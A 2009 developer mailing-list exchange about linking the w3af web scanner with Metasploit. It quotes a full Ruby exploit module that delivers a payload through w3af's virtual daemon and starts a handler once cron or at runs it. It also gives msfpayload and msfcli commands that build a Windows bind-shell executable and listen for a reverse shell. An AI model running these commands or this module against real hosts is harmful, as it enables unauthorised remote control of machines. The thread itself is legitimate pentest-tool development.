Adam, On Tue, Jun 30, 2009 at 4:34 PM, Adam Baldwin<adam_bald...@ngenuity-is.com> wrote: > Andres et al, > > Please take a peak, I updated the code so that it now loads and conforms > closer with Metasploit 3.2 framework specs. I'm sure there are other > things that need updating, but at least now the framework loads the > module and communicates with the virtual daemon.
You're the man! Thanks! I just commited this to the trunk, Something I've been thinking about a lot is to change the way metasploit interacts with w3af. I think that instead of making the user run the metasploit user interface, select the plugin, etc. we should use one of the metasploit features which is the msfpayload. Right now, metasploit sends the payload to the vdaemon, which then creates the EXE or PE file, and then sends it to the remote server. What I would like to do, is to use MSF to create the file, and remove the EXE/PE file creation from w3af. To do that, we need to run msfpayload to create the EXE/PE: ./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe Once the executable is created, we need to send it to the remote host (using any of the already available methods), and execute it. Before executing it, we need to run something like this on the w3af box: ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E I think that this is the way of doing it, it's much better, because we can wrap around MSF, and we are simplifying a lot of steps for novice users. More information about this way of working with MSF can be found here: http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html Do you have time to work with this? > Regards, > -Adam > > > > 26d25 > < module Msf > 28c27 > < class Exploits::Unix::Misc::W3af_vdaemon < Msf::Exploit::Remote > --- >> class Metasploit3 < Msf::Exploit::Remote > 30c29 > < include Exploit::Remote::Tcp > --- >> include Msf::Exploit::Remote::Tcp > 139d137 > < end > > ''' > w3af_vdaemon.rb > > Copyright 2006 Andres Riancho > > This file is part of w3af, w3af.sourceforge.net . > > w3af is free software; you can redistribute it and/or modify > it under the terms of the GNU General Public License as published by > the Free Software Foundation version 2 of the License. > > w3af is distributed in the hope that it will be useful, > but WITHOUT ANY WARRANTY; without even the implied warranty of > MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the > GNU General Public License for more details. > > You should have received a copy of the GNU General Public License > along with w3af; if not, write to the Free Software > Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA > > ''' > > > require 'msf/core' > > > class Metasploit3 < Msf::Exploit::Remote > > include Msf::Exploit::Remote::Tcp > > def initialize(info = {}) > super(update_info(info, > 'Name' => 'w3af virtual daemon exploit', > 'Description' => %q{ > This module is used to link metasploit and > w3af together. > }, > 'Author' => 'Andres Riancho', > 'License' => MSF_LICENSE, > 'Version' => '$Revision: 1 $', > 'References' => > [ > ['URL', 'http://w3af.sourceforge.net/'] > ], > 'DefaultOptions' => > { > 'EXITFUNC' => 'payload', > }, > > 'Payload' => > { > 'Space' => 8000, > 'DisableNops' => true, > }, > > 'Targets' => > [ > ['Windows', { 'Platform' => 'win' > } ], > ['Linux', { 'Platform' => 'linux' > } ] > ], > > 'Privileged' => true, > > 'DefaultTarget' => 0)) > > register_options( > [ > Opt::RHOST('172.16.1.128') > ], self.class) > > deregister_options('RPORT') > > end > > def recvWaitTime( theSocket ) > data = theSocket.get_once( 2 , 5 ) > return data.to_i > end > > def waitForData( waitTime, theSocket ) > sleep( waitTime ) > > # This loop is to receive the "<go>" sent by w3af > data = theSocket.get_once( 4 , 2 ) > #print_status("Received outside the loop: #{data}") > > while data == nil > print_status("Waiting...") > data = theSocket.get_once( 4 , 2 ) > #print_status("Received in loop: #{data}") > end > > theSocket.put('<doneWaiting>') > > return data > end > > def exploit > # Connect to the vdaemon and send the payload > vdaemonSock = connect(false, { 'RPORT' => 9091 , 'RHOST' => > '127.0.0.1' }) > # Say hi! > vdaemonSock.put('<metasploit-w3af-link>') > > remoteIP = vdaemonSock.get_once > print_status("The remote IP address is: #{remoteIP}") > print_status("Using remote IP address to create payloads.") > > vdaemonSock.put(payload.encoded.length.to_s.rjust(4)) > vdaemonSock.put(payload.encoded) > print_status("Sent payload to vdaemon.") > > response = recvWaitTime( vdaemonSock ) > print_status("The estimated time to wait for the extrusion > scan to complete is: #{response} seconds.") > waitForData( response, vdaemonSock ) > print_status("Done waiting!") > > response = recvWaitTime( vdaemonSock ) > print_status("The estimated time to wait for PE/ELF transfer > is: #{response} seconds.") > waitForData( response, vdaemonSock ) > print_status("Done waiting!") > > # Get how much time to wait > response = recvWaitTime( vdaemonSock ) > > # wait for the crontab/at to run > print_status("Going to wait for #{response} seconds (waiting > for crontab/at to execute payload).") > print_status("The session could start before the handler, so > please *be patient*.") > #waitForData( response.to_i, vdaemonSock ) > sleep( response.to_i ) > print_status("Done waiting!") > > print_status("Starting handler") > handler > > disconnect > end > > end > > ------------------------------------------------------------------------------ > > _______________________________________________ > W3af-develop mailing list > W3af-develop@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/w3af-develop > > -- Andrés Riancho Founder, Bonsai - Information Security http://www.bonsai-sec.com/ http://w3af.sf.net/ ------------------------------------------------------------------------------ _______________________________________________ W3af-develop mailing list W3af-develop@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/w3af-develop
